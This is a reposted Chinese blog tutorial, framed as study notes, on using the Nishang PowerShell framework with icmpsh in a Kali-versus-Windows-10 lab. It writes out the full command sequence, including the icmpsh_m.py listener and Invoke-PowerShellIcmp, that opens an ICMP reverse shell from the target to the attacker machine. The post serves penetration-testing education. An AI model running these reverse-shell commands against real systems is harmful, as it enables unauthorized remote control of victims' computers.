博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
基于powershell的渗透测试工具nishang
阅读量:2061 次
发布时间:2019-04-29

本文共 807 字,大约阅读时间需要 2 分钟。

本文为学习笔记,仅限学习交流。

不得利用、从事危害国家或人民安全、荣誉和利益等活动。
请参阅《中华人民共和国网络安全法》

Nishang是一款针对PowerShell的渗透工具。

先到github上去下载nishang,并解压
目标机下载nishang 地址:https://github.com/samratashok/nishang
攻击机下载icmpsh 地址:git clone https://github.com/inquisb/icmpsh.git

简介:

1,攻击机kali; 目标机 win10
2,win10开启PowerShell (3.0以上的环境中才可使用;win10自带5.1)
3,导入PowerShell框架
4,获取命令-nishang模块
5,kali安装icmpsh工具

第一, 目标机配置部分::

nishang的使用是要在PowerShell 3.0以上的环境中才可使用(win10自带5.1)
在这里插入图片描述
查看版本 Get-host
在这里插入图片描述
PowerShell框架是需要导入的
命令:Import-Module nishang地址

Import-Module D:\nishang\nishang-master\nishang.psm1

在这里插入图片描述
在这里插入图片描述
获取命令-nishang模块
Get-Command -Module nishang

在这里插入图片描述

第二,(Kali)攻击机配置部分:
进入kali中icmpsh目录下,输入命令sysctl -w net.ipv4.icmp_echo_ignore_all=1来禁止ICMP回显

./icmpsh_m.py kaliIP 本机IP

./icmpsh_m.py 192.168.0.33 192.168.0.180

在这里插入图片描述

在win10中输入命令Invoke-PowerShellIcmp -IPAddress 192.168.0.33并执行
即在kali中拿到shell。

转载地址:http://iwmlf.baihongyu.com/

你可能感兴趣的文章
C语言字符、字符串操作偏僻函数总结
查看>>
Git的Patch功能
查看>>
分析C语言的声明
查看>>
TCP为什么是三次握手,为什么不是两次或者四次 && TCP四次挥手
查看>>
C结构体、C++结构体、C++类的区别
查看>>
进程和线程的概念、区别和联系
查看>>
CMake 入门实战
查看>>
绑定CPU逻辑核心的利器——taskset
查看>>
Linux下perf性能测试火焰图只显示函数地址不显示函数名的问题
查看>>
c结构体、c++结构体和c++类的区别以及错误纠正
查看>>
Linux下查看根目录各文件内存占用情况
查看>>
A星算法详解(个人认为最详细,最通俗易懂的一个版本)
查看>>
利用栈实现DFS
查看>>
逆序对的数量(递归+归并思想)
查看>>
数的范围(二分查找上下界)
查看>>
算法导论阅读顺序
查看>>
Windows程序设计:直线绘制
查看>>
linux之CentOS下文件解压方式
查看>>
Django字段的创建并连接MYSQL
查看>>
div标签布局的使用
查看>>